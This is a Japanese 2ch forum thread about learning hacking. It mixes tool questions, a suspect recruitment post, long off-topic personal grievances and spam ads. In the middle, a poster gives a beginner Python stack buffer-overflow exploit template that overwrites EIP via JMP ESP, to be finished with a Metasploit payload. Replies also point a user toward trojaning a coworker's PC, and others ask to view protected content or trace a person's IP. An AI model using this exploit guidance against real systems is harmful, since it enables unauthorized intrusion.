ハッキングを学びたい part3 [転載禁止]©2ch.net
>>331
どんなエラーか載せてくれたら相談のるぞ >>340
https://github.com/ilektrojohn/creepy/issues/74
ここの[{u'message': u'SSL is required', u'code': 92}] と言う
エラーだったんですが、最新版ではなかったようで
それでここのhttp://www.geocreepy.com/公式に書いてある通りに
最新版を使うための道具を
apt-get remove --purge creepy
apt-get autoremove
pip install -U pytz python-qt flickrapi python-instagram yapsy tweepy google-api-python-client python-dateutil configobj dominate
このマニュアルの通りにインストールを試みたのですが、
・・・・・・・・あれ??インストールできた(笑)
色々試行錯誤しているうちにできました。 ここのハッカー見習いでもいいので
育てたい+雇いたいんだが
誰か真剣に興味がある人いるかい?
真剣な人 >>346
主にセキュリティの専門知識と技術向上が目的になりますか?
人間の人生について次の内だと何が一番大切に思いますか?
1、栄光と影響 2、自己開発 3、家族と子供 4、余暇休息
人類について次の内だと何が一番大切に思いますか?
1、知恵 2、誠実 3、美意識 4、権力
嫌いな国を3つあげるなら順位的にどうなりますか?
1、 2、 3、
お手数をかけます。 >>347
1 はい!今よりもより知識を広げたいです
2 影響と栄光
3 知恵
4 1.中国 2.韓国 3.ロシア >>348
大変申し訳ございませんがこの度は難しいと判断致しました。
重ねて誠に申し訳ございませんでした。 >>345
ハイ
>>347
人間の人生について次の内だと何が一番大切に思いますか?
2、自己開発
人類について次の内だと何が一番大切に思いますか?
2、誠実
嫌いな国を3つあげるなら順位的にどうなりますか?
1、日本 2、北朝鮮 3、アメリカ セキュリティ板とネットワーク板の質問スレを両方見たのですが、このスレは教えて貰って良いそうなので、こっちの方が適しているかと思い来ました。
質問なので上げ
スペックが書けないのでここのスレにしましたが、元は法律板の質問です。私のではありません。私が見た質問ですが。 http://www.bengo4.com/other/1146/1288/b_416131/http://archive.is/86Dqz
弁護士ドットコムで聞いたのがこれです
http://www.bengo4.com/other/1146/1288/b_416131/ 保存http://archive.is/86Dqz
身に覚えの無い結婚詐欺で300万円返して無いと 同じ会社の別 部署の女性事務員から… ある掲示板の質問
元のスレ↓
http://hayabusa6.2ch.net/test/read.cgi/shikaku/1450088302/206-
http://hayabusa6.2ch.net/test/read.cgi/shikaku/1450088302/334-
身に覚えのない300万円貸したという事が、結婚式誓約書として、書かれたメールに記されている事を証拠に、同じ会社の別部署の女性事務員から
婚約破棄(原文ママ)で訴えられて、メール発信のIPアドレスが本人の会社の席のPCからなので、本人の弁護士にこれが証拠になって負けるので
和解して、300万円払った方が良い、判決で、300万円プラス慰謝料も払わされる結果が出ると言われている
法律板相談スレでは適当な人が多いけど、それでも、他の弁護士に相談というレスもあったが、本人がうつ状態なのかも。
釣りの可能性もあるかもしれないが システム的に可能なのではないかと思うのでそれを聞きに来た 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322) LAN 内で、他のPCのIPアドレスを知るソフトはありますよね?
IPアドレスがわかったら、そのPCにトロイのようなウィルスを送る事も出来ますか?
送るというか、ポートが開いているいるところがあれば侵入?
同じ会社なので、本人のPCにキーロガーのようなものを仕込む事もそのPCに触れるなら出来ますよね?
前にも本人に、社内SEやネットワーク管理者に相談したのか、調査してもらったか聞いたのですが
一般的にこういうことがあれば、社内調査もして、社内のシステム担当にも調査の話はありますよね?
本人は探偵に調査依頼してダメだったと書いていますが、前は出てなかった話です。
こうやって書いてみると、疑問点が多いですね >>351
metasploitというピッタリのツールがあるやんけ
トロイの送付まで自動でやってくれるよ >>353
ありがとうございます。
それを書籍で書証にするか、SEかLAN技術者のような専門的知識持った人に、証言してもらうよう
伝えて来ます。 >>354
Metasploitはそんなに知識がなくても、やり方覚えれば誰でも出来るからな
つべにも海外のひとらが動画あげてるぞ >>355
でも、ルーター挟めば大丈夫なんですよね? >>356
MetasploitはLAN内でもグローバルでもできるぞ
Metasploitを簡単にしたArmitageとかいうのもあるし こういうの見てると、政府という存在事はて敵に思えるわ。怪しい中国製品はよく買ってるが。
http://logmi.jp/46036 こういうの見てると、政府という存在は全て敵に思えるわ。怪しい中国製品はよく買ってるが。
http://logmi.jp/46036
自分が日本を嫌いなのは、俺の叔母が精神病院に10年以上投獄されているのに放置されているから。
昔から身内の結婚に響くとか、収入がないとかで家庭内で喧嘩だらけだった。
俺まで子供のころからキチガイの遺伝扱いされ、おなじみの下らない学校イジメと不適応。その後働かずブラブラしてたら、精神病院に送られて薬漬けに → 脱出
→薬の離脱症状でのたうち回り、廃人に
→何年もかけて回復したが、アラサーになってしまった
俺がこうやっている間、叔母は強制入院で精神病院に拉致されたまま10年以上放置されている。 >>359
乙、いろいろ大変だったんだな
PC、セキュリティに興味もったのはなんのきっかけで? >>359
弁護士に相談はしてないの?
被害をネットで書くとそういう事実を知ってる人以外は、キチガイ扱いしてくるけど、本当は知っていて叩いているか工作員ではないかと
被害と被害妄想の区別が付きにくいとは言うものの、老人施設でも虐待はある。そういう施設に関しては、虐待はあるものと思えと考え、無くすように対処しようという
方針を公的機関が文章化している。
もしかして、この板でW合病院の事をネームに入れて書いているのはあなたでしょうか? どこまで行き届いているかは、わからないけど、都道府県単位で精神病院の処遇改善に取り組む機関は作っている
このリンクでは、リンク切れだけど大阪弁護士会ははっきり精神病院は人権侵害の温床とまで言っている
http://note.chiebukuro.yahoo.co.jp/detail/n323198
精神科に強制入院させられた友人を救う方法 精神病院処遇改善や人権救済機関
処遇改善だけでなく、入退院措置も相談に乗れるはず
叔母さんは、今の状態で外に出ても、自分で生活していけないだろうから社会的入院というのになっている可能性が高いと思う。
長期入院は取り締まる方向に動いてるはずだけど、W病院はスレでも不思議がられていた。
10年以上叔母が・・・という話はそのスレ見た事がある。 http://archive.is/UJlOZ
大阪弁護士会のは、これです。
はっきり書いてます。
> 精神保健支援業務 高齢者・障害者総合支援
>精神保健支援業務の意義と目的
>ーなぜ弁護士がこのような活動を行っているのかー
>精神障害者ないし精神病というものに対しては、一般には得体の知れないもの、恐いものといった無知・無理解があります。そこから、精神障害を持つ人に対しては精神病院等の施設に入院
>(強制入院が中心)させ、社会から隔離するという発想が長らく続き、また、施設内においても通常の医療というイメージからかけ離れた患者処遇が常態化し、人権侵害の温床となってきました。
>近年、精神保健福祉法に基づき、都道府県知事への退院請求や処遇改善請求等の救済制度が一応整えられてきています。しかし、患者自身に その制度の存在が十分に知らされていないことや
>入院中の患者の代理人として法的援助を行う制度が存在していないことから、この申立制度 は申立件数も少なく、患者救済のために十分機能しているとは言いがたい現状です。 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322) でも、「 精神科に強制入院させられた友人を救う方法 精神病院処遇改善や人権救済機関 」にも書いたように
大阪精神医療人権センターというところは、この書き込みだけで、コメント欄無くしさえしました。
http://archive.is/r2Zca
電話一本名古屋の保健所や精神保健センターにしようとしなかった。電話でそちらではどうしているか聞いたら、入院させられていた病院とは別の系列の公立の病院に診察してもらって
入院が必要ではないという所見を取ったり、書いてもらったりしているなどと言っていた電話の録音もバッチリある。その後瀬戸市にいた時にも電話したら
居丈高に「もう、相談に乗れません!」と言い放たれている録音も。こっちは何一つその相談者の人格を否定するような事は言ってません。だって録音してるんだから。。。
それ以外にも私よりよっぽど過激で、自分が入院した久里浜の病院のブログを作って
薬も飲みまくっているアルコール依存症で看護師という男性もコメント欄全消しに・・・
本人がちょうど見てない時に最初書き込んだら、見てなかったので、だったか、見ていれば、みたいな返事があったので再度書いたらそうなりました
これも知恵ノートには魚拓で載せてます
まあこういう現状ですが、弁護士ドットコムでは西田先生が、こうおっしゃっています。
続く 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322) http://www.bengo4.com/sozoku/b_412134/
裁判の本にも出ている精神病院
図書館で、日本の裁判についてこれでいいのかと問う本を借りたら、精神病院のU病院という院長が逮捕された病院の話が 載ってました。
有名な朝日新聞のルポ以外の本で、アメリカで画家として個展も開いていたこともある人で日本でも東京で美術関係の仕事を していた人の本も載ってま した。
ネットでは問題提起すると、タブー視されたり、叩き対象になる話題ですが、図書館では精神病院告発関係の本がある棚では なく、司法や法律関係の本の棚に置 いてある本にも普通に載せられていることに驚きました。
各地の単位弁護士会というその地域の弁護士会でも、精神医療に関する人権問題への取り組みがHPに載っています。 当番制 度を作っている弁護士会もあ ります。
こういう状況を見ると、弁護士の方にとっては、精神病院の人権侵害というのは、
ありふれた事という感覚なのでしょうか?
または、あってもおかしくない事と捉えておられるのでしょうか?
しかし、実際相談に来られても困ってしまうのではないかと思いますが・・・
http://archive.is/ecMUB
これは削除にされないために、短文お礼しか書かなかったけど、疑問は山のようにあるが・・・
もし本人のところに相談に行ったらどうなるのか など こっちが東京だと知ってるから来ないと思って書いているのかなど
それにそういう意味ではなくて、本当に実名での回答の勇気に感動したんだけど 実名での回答の勇気に感謝しますなど書いたら、嫌味か皮肉か、下手すると脅しに思われるのではないかと思ったりしたので
(別アカか何かで削除にされたのに東京にいると書いていた) 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322) スレチごめんなさい。
精/神/病/院を巡る利/権/構/造は、こうなってます。
http://note.chiebukuro.yahoo.co.jp/detail/n312528
精/神/医/療/問/題/点の指/摘
社/会/的/入/院の人も他に引き取ってくれる病/院があれば、時東さんのようにもなれるはず
http://note.chiebukuro.yahoo.co.jp/detail/n314133
双/葉(ふたば)病/院の謎
精/神/医/療/問/題/点の指/摘 http://note.chiebukuro.yahoo.co.jp/detail/n312528 に載せたくろねこの散歩道のブログの人は、精神医療の構造的批判もしつつ、
精/神/科/医に知り合いもいて(べてるの家で町起こししているような)、結構良い位置に居る
ネット上の協/力だけで良いので、協/力してくれるように頼んでみませんか?一緒に。
ネット上の協/力とは、リンクや拡/散/協/力などの事です。 >>350
1点だけ大きな致命的問題を感じたので聞かせていただければ幸いなのですが
日本が嫌いなのはなぜでしょうか?
あと真剣な場合こちらから連絡させていただきます。念の為連絡用のステアドはお持ちですか?
無いならばこちらで用意します。 >>367
>>350じゃないけど、>>347の設問(質問ではなく設問ですよね?)は、答えられないものもあると思います。
嫌いな国と言っても、国単位で決められない問題では?
そこに実際に住んでいる市井の人と首脳部では全然違うとか
例えば北朝鮮首脳部を好きという人は日本ではいないでしょうけど、北朝鮮の国民は被害者のようなものです。
そこまでのではなくても、個人としての国民性と国としての姿勢とかに対する受け取り方や思いの違いもありますよね?
その国の文化は嫌いじゃないけど、その国の政府は嫌いとか
なぜ文化は好きかというと、政府批判的なものがあったからだったみたいな(例として出しただけで自分がではありません)。
批判もしつつ、批判に潰されない黒人文化はやっぱり良いと思いますが、あまりに尖鋭的批判は怖いと自分は感じます。
さっき書きかけて消えてしまったのですが
こういうのではないですよね?
http://archive.is/yHM3c 今はジモティーから消えていたので、キャッシュの保存
お金を貯めたい方、必見!!
南相馬市でのPC作業です。。。 👀
Rock54: Caution(BBR-MD5:1322b9cf791dd10729e510ca36a73322) >>367
>>359に書いてある事では?
こういうところで求人募集って・・・
福島じゃなくても、アノニマス的なものとか?
アノニマスは、こうだった・・・
左翼デモにかり出される要員みたいw
あなたのために働きます。アノニマス - Togetterまとめ
http://togetter.com/li/680414
+マニアン @Tasmanian_good 2014-06-15 05:49:39. 共産党と戦うと、アノニマス とも戦う事になるんだ!! アノニマ スはよく、我々は複数だーーーとか言って、脅しの ように恐怖で人を支配しようとする人がするような事を書きますよね あれが似てるなあと 思っ ...
アノニマスについての検索結果保存 資料としてブクマなど - Togetterまとめ
http://togetter.com/li/679204
2014年6月12日 ... Tasmanian_good 864 view 9 コメント ... “CNN.co.jp : ハッカー集団「アノニマス」、米 司法省サイト を乗っ取り 脅迫文も” htn.to/njc8GjyocGF ... あとでみる 資料 ブクマ / “ 日本アノニマス 若年層 - Google Search” ln.is/htn.to/4LZkW. >>360
昔からPCが心の友でしてな。PCは小学校の時に買ってもらったのが最初。だがネット環境はなくて、結局ゲーム機と化した。
その他の経緯は
http://peace.2ch.net/test/read.cgi/hack/1409353150/910
>>361
このスレで詳しいことは言えませんが、ありがとうございます。
もの凄く、精神病院の問題に詳しい方のようですね。
叔母の件は、事件化に向けて頑張っています。 >>367
連絡先はこちらです。
donate_aho@yahoo.co.jp
日本が嫌いなのは>>359という個人的な事情があるからです。投薬治療の影響なのか、軽いジスキネジアになりましたが補償は受けてません。日本は精神薬の有害作用を認めさせるのが非常に難しいらしい。
おかげでスポーツの夢は潰えました。
残念ながらバッキングやプログラミングのレベルはキディレベルです。eスポーツで遊ぶのが趣味というか。
これから先、自分が満足出来そうな分野はコンピュータしかないと思っています。 >>371
訂正:バッキングじゃなくてハッキングでした。
>>361-366
弁護士には相談しましたよ。裁判にしても「まず勝てません」とのこと。
そりゃそうですよ。病院の過剰投薬で死亡した事件も裁判で負けてましたから。
しかし、過去に伊藤病院不当入院事件というのがありまして、この件は本人による民事訴訟で勝てています。
yabusaka.moo.jp/seisinbyouin.htm
叔母の入院は、この伊藤病院事件の状況に酷似しているんですよ。ただ本人が廃人みたいになってまして、訴訟能力があるかどうか。 >>372
裁判じゃなくて処遇改善や、転院についてですよ。
弁護士にというより、そういう改善に取り組んでいる部所?というか
都道府県単位で、公的機関としてあるものと、弁護士会が設けているものとあります。
弁護士は弁護士ドットコム内でも、意見が分かれたり間違っている事を回答していることもあります。弁護士自身がそう書いています。
人権を標榜している大阪精神医療人権センターも弁護士主動の団体ですが、前述のように酷かったのですが
まだまだ他に方法はあります。
最近には弁護士も、こう書いてますし >>365
365に載せた 弁護士ドットコムの 弁護士回答↓
> こういう状況を見ると、弁護士の方にとっては、精神病院の人権侵害というのは、ありふれた事という感覚なのでしょう か?
かなり存在している感覚です。
> しかし、実際相談に来られても困ってしまうのではないかと思いますが・・・
弁護士会も積極的に取り組もうとしています。
> 訴訟以外で、依頼を受ける事は出来るのでしょうか?例えば再入院を防ぐとか
当然依頼を受けることがあります。 > > 無いとか回答してた他質問への答で見た事もありますが、弁護士会の精神病院に関する相談は使える地域は無いのでしょうか?
ある地域の精神病院内の待遇改善の電話相談では、精神病院内からの相談しか受け付けてないと、事務員の人の責任 者のような人に言われました。
通常はそのような相談も受け付けていることが多いと思います。 >>372
そうですか。。。
色々あるんですね。。。
あのぉ、KSという弁護士については、やり過ぎだと思うので、関わらない方がよろしいのでは?
弁護士に問題があったとしても、その解決策として妥当な方法とも思えませんし、もはや集団心理で捌け口のように攻撃やからかいをされているだけでは?
他にもっと問題なことはあるし、問題な弁護士はいると思いますが。
返信ありがとうございました。
私は詳しいというより、自分自身逃げている状態で、親に見つかったら何をされるかわからない立場だから、調べなくてはいけなくて調べただけです。
名古屋の区役所で、実質虐待証明になるマイナンバーの住所登録地以外の住所への送付という支援措置や、住民票の閲覧制限(そこでかけてあまり意味はないけどもし移す場合
他自治体で、閲覧制限かけやすいかもという配慮から)は、できましたが、これは他自治体に行くからやってくれただけのことで実際にはもっとサポートすべきなのにおかしいと思っています。
ずっと前の事はともかく、数年前の事は物凄く証拠もあったので(一部youtubeにアップしている録音も) 追記
KS氏より、できればこういうのを告発や拡散お願いしたいです。
共/産/党(アップしている録音ではマスキング)が、そんな事言うわけない!と京/都の借/地借/家人/組/合に言われてます
http://www.youtube.com/watch?v=GfbqZ2ZzDQw
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13152932868 拡散【 左翼系弁護士たちの怖さを知った人私以外にも居ますか?】希望
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11152175456 違法に建物を壊されるような立退きに遭った人いますか?
弁護士ドットコムでは、消されました。
http://archive.today/aDeuz ある正義の味方の政党系弁護士にされたモラハラ
ある大手企業を訴えた女弁護士ですが、その企業とはト○タです。 👀
Rock54: Caution(BBR-MD5:a3781ace2e9924b3cc1824cf6f803ee4) >>345
プログラマとして働いている、趣味はctf
どんな感じなのですか?興味があります。 >>347
主にセキュリティの専門知識と技術向上が目的になりますか?
人間の人生について次の内だと何が一番大切に思いますか?
2、自己開発
人類について次の内だと何が一番大切に思いますか?
1、知恵
嫌いな国を3つあげるなら順位的にどうなりますか?
1日本 2アメリカ 3北朝鮮
お手数をかけます。 おいおい、こんなにインチキくさいやつに教わるとか勘弁してくれ。第一、そいつがどれだけ知識があるかわからないのに、馬鹿じゃねーのw >>347とかどう見ても自分に酔ってるだけのアホだろ
何で真面目に答えてる奴が居るんだよwwwwww
簡単なレベルなら教えてやんよ
まずソケットプログラム作れ、今回はpythonで書く
#!/usr/bin/python
#
import socket
exploit = b"A" * 1000
payload = b"\x00\x00"
sploit = exploit + payload
printf(sploit)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()
ま、これが簡単なソケットプログラムな
windowsでollydbgやimmunity debuggerで脆弱性のある鯖を起動する
上のソケットプログラムのIPとポートを変えてAを1000個などの大量のパケットを送信する
ollydbgやimmunity debuggerの方にあるregistersのEIPって所を見ると41414141とかになったりすることがある
EIPの41414141は翻訳すると"AAAA"ってことなんだよ、もちろん"A"の部分を"B"にすればEIPは42424242ってなって翻訳すると"BBBB"ってことになる
つまりregistersのEIPに送信したパケットが入ればいい、これがよく言われるバッファオーバーフローって現象
あとはmetasploitとかを使ってpayloadを作成して"\x00\x00"って所に貼り付けて"A"の個数をEIPまで調節すれば任意のコードが動く
自動化するツールもあるけれど殆どのハッカーはこういう感じで脆弱性を探してるんだよ >>381
脆弱性のある鯖だったらvm playerとかじゃないの?
ollydbgはデバッガだけど… >>345
知識とかはどうでもいいから、仕事持ってないかな >>382は鯖を起動するならvm playerとかで仮想環境で起動するんじゃないの?ということね >>384
確かにOS起動しなくなったりすることもあるから仮想環境で実行した方が安全ではある
言葉が足りなかったかもしれんから書いとくがデバッガーを起動してデバッガーで鯖ソフトを逆アセンブルにかけてエミュレート実行ってことな
仮想OS上でデバッガーを使ってエミュレートするってのでも問題無い
ローカルの権限昇格も似たように
C:\windows\system32>sample.exe "AAAAAA"
とか引数入力してEIPが41414141になるかとかを調べりゃいいだよ
基本としてはESPからEBPまでがスタックの範囲だからJMP ESPを探してアドレスを憶えとく(search for->CommandsとかにJMP ESPとか入れて検索
EIPにJMP ESPのアドレスを入力する
>>381に付け加えるとするなら
#!/usr/bin/python
#
import socket
junk = b"A" * 1000 #EIPまで適当なデータを入力
eip = b"\x67\x45\x23\x01" #JMP ESP命令のアドレスが01234567だった場合
payload = b"\x00\x00" #実行命令本体
sploit = junk + eip +payload
printf(sploit)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 10000)) #IP,ポート
s.send(sploit)
s.close()
まぁ、こんなの調べればどこにでも書いてることだがな >>386
ファジング的なやり方って効率イイの?
オーバーフローしたらラッキーってやり方は効率が悪いと思うんだけど
デバッガでちまちま解析したほうがいいと思うんだ
そもそもコード自体に脆弱性があるかどうかわからないし >>388
簡単なレベルの解説だから効率は度外視してる
このレベルの原理ならファザー使った方が早いよ
>>1から読んだけどツールの使い方くらいでデバッガーで解析出来るレベルの人が居ないでしょ・・・
そうなるとスタートラインに立つための足掛かりとなる解説とコードくらいは必要じゃん?
どっちにしても解析しないとコードに脆弱性があるか分からないのは同じだぞ >>389
なるほどな、確かにツールの使い方ばかりだったな
そういうことかありがとう。>>389は得意分野はバイナリだったりする? >>391
解析するのは割と好きだけどプログラム組むとIAT構築とか面倒な部分あるから微妙
普段使うならpython、c、c#、php辺りが妥当でしょ
一番嫌な言語はjavaだな、仕様変更が多い、脆弱性が多い、速度が遅い、の三冠王
androidで使うけど速度遅くてイラつく >>392
やっぱり解析はするんだな、バイナリってのは言語のことではなくて
ネットワーク、web、バイナリ、分野を大まかに分けたことだったんだがctfer以外は
以外には通じないのかな?
普段使うならその選択肢がいいな >>393
全部独学だからCTFer以外に通じるかは知らないがバイナリと言えばアセンブラ言語か機械語だな
解析するのは好きだが解析が得意かは別
必要があればパケットもコードも解析するし、XSSとかSQLインジェクションみたいな脆弱性も解析する
ハード面の解析はハード買う金がかかるからやらない 【社会/ネット】SNSの写真だけで合鍵が作れる――3Dプリンタを使った現実世界の“ハッキング”に注意 [無断転載禁止]・2ch.net
http://d aily.2ch.net/test/read.cgi/newsplus/1453972236/
SNSにあげた写真から、合鍵が作られるかも――カスペルスキーは1月28日、3Dプリンタを使って
合鍵を複製する、現実世界での“ハッキング”に注意する内容のブログを公開した。
3D印刷技術の進化により、金属工芸やプログラミングの技術、物理的な鍵の入手など、これまで
合鍵を作るのに必要だった条件が不要になり、簡単に安価に合鍵を生成できるようになったという。
昨年12月にドイツで行われたカンファレンス「32C3」では、3Dプリンタを利用した鍵の偽造方法に
ついて報告があった。
最も一般的な鍵システムの1つ、ピンタブラー錠は、写真を元に遠隔で3Dプリントすることもできるという。
最近のカメラは解像度が高く、写りの悪い写真でもレプリカを印刷できる恐れがあるとしている。
深い溝のある特殊加工されたバンプキーが必要な「バンピング」という手法を使う際も、金属に比べ
プラスチック製の方が衝撃を伝えやすく、解錠の音や鍵穴を損傷させるリスクも小さく、優れた
選択肢になる。3Dモデル作成と印刷は金属を扱うよりも簡単だ。
3Dプリント技術はマスターキー作成も簡易にしているという。対象となる鍵穴の1つに合う通常の鍵を
持っていれば、溝の1つを変形させ、企業や施設内の複数の鍵穴に共通して使える鍵を作成できる――
ということだ。鍵のサンプルを複数用意して試行錯誤するには3D印刷で量産するのが適している。
同社は対策として、「鍵は実世界におけるパスワード」とサイバーセキュリティと同様に考えることを
提案。「一般的なピンタンブラー錠ではなく、より複雑なロックシステムを選ぶ」(簡単なパスワードは
使わない)、「2段階認証を使う」(違う種類の鍵や認証手段があれば安心)、「パスワードを漏らさない」
(鍵の写真をオンラインに投稿しない)――などを挙げている。
ソース/YAHOO!ニュース(ITmedia)
http://headlines.yahoo.co.jp/hl?a=20160128-00000081-zdn_n-sci windowsのコマンドプロンプトやlinuxを仮想マシンで起動してハッキングツールいじってるぐらいの素人ですが、
簡単でなおかつ効果のあるハッキング手法は、ありませんか?
一度でいいからハッキングしてみたいです。 Metasploitとか、それを簡単にしたArmitageとかがあるぞ。Windows2000くらいがどれだけ危険なのかがわかる
つべで調べたら、やり方沢山乗ってるあと、他人の鯖でやったらお縄になるから必ずVMとかでやれ ハッカーって、ネットワーク系だけじゃないよね。映画とかはよく悪人にされるけど... ハッカーってどうやって見抜くんですか??
あなたはハッカーですかと聞いた時にはいそうですといったらハッカーなんですか?? マルウェアのリポジトリ取得してそのフォルダをTwitterにアップしただけで
書類送検されるらしいぞ! 当方初心者、質問です
ワッチョイの後についてるIPを書き換えたらしき物からハッキング、クラッキング等される可能性はありますか? ありがとうございます、じゃあ生IP?からはありますか? 生IPからクラッキングされる事は、あるだろうね
まぁ個人をクラッキングなんて悪趣味な奴しかやらん
悪趣味な奴を敵に回してたらしらん DOS攻撃されなきゃファイアーウォールでどうにかなるんじゃ?
僕も詳しくは解りません。
ファイアーウォールしててもハッキングなんてされるもんなのかなぁ・・・。 ファイヤーウォールを無敵の鉄壁か何かだと思ってる?
通信するのに穴のない壁など使えるわけないよね? 最強のファイヤーウォールはLANケーブルを抜くこと サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考
https://www.amazon.co.jp/dp/4873117313/ref=cm_sw_r_cp_awd_2fCYwbRVP96TX
サイバーセキュリティ方面のプログラミング言語はPythonをチラホラ聞くけどRubyじゃダメなの?
やっぱJAVA、C、js、Pythonあたりは押さえとくのは常識なんかな? >>414
何故pythonかと言うとPCの現行OSではデフォルトで入ってるから100%コンパイルが可能
windowsはC#かVBでlinuxはpythonがデフォルトでコンパイラが入ってる
他の言語は常識って訳じゃないけど読める程度には憶えた方がいい
androidならjava、iosならc、web鯖ならsqlとphpが多い
どの環境でも対応出来る言語の方が重要ってことなんだと思う >>415
なるほどサンクス
わいMac使ってて少し前にPython3は入れたんだけどまだ触ってない
プログラミング初心者なんだがPythonからでもよかろうか? プログラミング初めてならPythonからのほうがいいかも
Python2.xとPython3.xの文法が微妙に違うから注意な >>411
家庭用ならアウトバウンドだけ許可しているようなFWはいくらでもあるじゃん >>409
ありがとうございます
えっと、気づかずになにかされてるかもしれないのですかね?
偶にセキュリティソフトやらマイクロソフト?からされてるような警告が出てた記憶があるんですが?
やる側もプロバ等から回線をつないだ記録は残ってるもんなのですかね?
どの程度かでも残ってればいずれ文明が発展したりして
開示条件次第等で過去に遡って特定出来る時代が来る可能性はありますか? >>416
全然問題無いぞ
公式のリファレンスとか他言語より初心者向きに書いてるし
>>417の言う通り微妙に違うし、3.xより2.xの方がlinuxでよく使われてるから最初は3.xより2.xの方がおススメ .
.
板違い(?)の上に、話をさえぎってしまいゴメンナサイ!(*_ _)人
でも、この板のユーザーさんにも有意義な告知かと思うのでカキコませてください。
★ 謝礼は十分いたします ★ アメブロなどのサイト制作ができる方!!
アメブロなどを使用してのサイト制作のできる方を早急に求めています!
私はリケジョやPC女子からはほど遠く、サイト作成にはまったく疎いのでとても不自由しています…(> <;)
そこで私に代わりサイトを作成してくださる方を求めてこの場をお借りしました。
■サイトの内容…
アダルト系、違法性、その他公序良俗に反するものではありませんのでご安心ください。
■サイト制作の仕様ベース…
アメーバブログで十分です。願わくばwordpressなどのブログ形式のサイトを希望します。
それに準ずるもので使い慣れたものがあれば別のものでも構いません。
■条件はありません…
技術さえお持ちでしたら、学歴・職歴等は一切問いません。
フリーター、ニート、高齢ニート、コミュニケーション障害をお持ちの方、引きこもりの方、中年失業者、長期無職等、歓迎!
■作業形態…
作業は在宅でやって頂くことになりますので、時間の指定は一切ありません。別のお仕事の傍らに…でもOKです。
■詳細をお知りになりたい方は…
下記メールアドレスまでご連絡ください。詳しく書いた返信文を差し上げます。
※真剣な告知です。冷やかしはご遠慮ください。
井 上
inoue1952w★gmail.com
迷惑メール対策のため@部分を★にしてあります。
実際に送信する際には★を@マークに変えてください。
.
. 井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
せっかくやから★を@に変えといたったで
親切やろ?ワイに感謝しろや 👀
Rock54: Caution(BBR-MD5:0be15ced7fbdb9fdb4d0ce1929c1b82f) >>419
お前何人だよ読みにくいんだよ
答える気失せるわ死ねよ いやマジでここ最近オッパイソンさんのリリースラッシュは何なの?
3月にも出るし毎月数冊出てねえか?www
これはもうPython触るしかない! >>427
何を今更
LINEなんて情弱が訳も分からず便利だからってだけで使うツールだろ ゼロデイアタックなのかな?
高校生自身で脆弱性を見つけたのならすごい話だね そのうちLINEのセキュリティ部門に引っ張られるんじゃない? 「ハッカーの学校」読んだ。
aircrack-ng等の無線ネットワークのハッキングがすっぽり抜けてる点でつまらん。
相変わらずツールの解説が多い。
これだけでは十分な内容とは言えない。前作の「ハッカーの教科書」と合わせて読んだほうが良い。
白夜書房のハッカージャパンのほうが面白かった。
ハッキングの勉強はネットのほうが充実してると思う。kaliのフォーラムとかYouTubeとか。 変なのが湧いてるね
こんなところで人材募集してどうするんだろう
最初から冷やかしだろう >>437
もっとひどいのは古くて使えない本に書いてある基本のない使えない人間が増えたこと
たとえば、わい backtrackの次のバージョン
backtrack5 r3 -> kali linux 1.0 -> 2.0 ハッカーの学校 個人情報調査の教科書
読んだ。第1段のよりスゲー面白かった。
尾行のやり方、ゴミから個人情報を得る方法、ピッキング解錠とか、鍵を拳で握り混んで武器にするとか書いてあるけど、この著者は何者ですか?(笑)
かなりサイバー犯罪者向けの内容で大満足でした(爆)
ついでに近くの棚にあったドローン自作の本も読んできたけど、オープンソースのソフトを使えば簡単かつ安上がりにドローン作れるっぽいね。 >>440
Debianでも使ってろ
このdebu野郎が チャット相手のIPアドレス知りたいがパケット見てもわからんね
誘導サイト使うのは一度しか使えないし
なりすまし相手をどうにしかしたい好奇心 >>447
IPアドレスなんて通常動的に割り当てられるこの時代、知って何が嬉しいの? >>448
スカイプはパケット見れば分かります
チャットと検索して出てくるようなものを想定していただければと思います
>>449
日をまたがずにリリース時間内で出入りがあるのでIPは変わっていないはずです
固定IPアドレスのKDDIなんてのもありますしね >>405
遅れた。ごめん
http://www.sankei.com/west/news/160217/wst1602170006-n1.html
正確には「日本政府を攻撃したい」って予告しただけみたいだが
アカウント上でZeusやらをgitで拾ったのを晒したのも捕まった原因の一つとかどうとか >>444
ショッカー氏、糖質に近づいてないか・・・ あるwordpressで作られたブログの会員向けコンテンツを見たいだけなんだけどどうしたらいいかな
乗っ取りとかしたいんじゃなくて、こっそり見たいだけ 更新し続けてほしいし
パスワードだけで保護されてるからなんとかならんかな〜 スカイプはP2Pだからな
そうじゃないのなら鯖の中見るしか すいません、十年くらい前のプロバイダーの
HOST: −−−−− .ne.jp を未だに晒されてるんですがこれがIPでしょうか?
これでハッキングが出来、またされてる可能性があったりしますでしょうか?
されてるならどこまで見られるものなのでしょうか? 十年くらい前と言うのは運営の強制IPスレへの書き込み時に晒してしまった時期です
プロバイダーは変更どころか完全放置し続けています 基本的にそれはFQDNになるんでしょうから、インターネットにおけるあなたの場所を示しています
なのであなたに攻撃を仕掛けようとする場合はそこを目掛けて行います
ただし、固定IP契約でないのであれば、おそらくルーター再起動等でIPアドレスは変わってるでしょうから、
そのfusianasanされてるFQDNが示すIPとあなたの実際のIPは異なっている可能性が高いので心配ないと思います
それにさらされていようがさらされていまいが攻撃されるときはされますので安心してください >>459
ありがとうございます、例えばキャッシュを消して回線を切断して繋ぎ直せば2chの板毎のIDが変わります
これが固定IPではないという事でそういうプロパイダーがメジャーだという認識でいいでしょうか?
関係なく攻撃されるという意味が分かりません
ハッキングとはターゲットが無差別なのでしょうか?
当方●流出時に住所氏名割れています
Googleマップで晒されたり削除されたので見てませんが街BBSにも晒されたそうです >>460
そもそもそんなに晒されるような悪事を働いたんですか?
IDをころころ変えられたのなら固定IPではないですね。
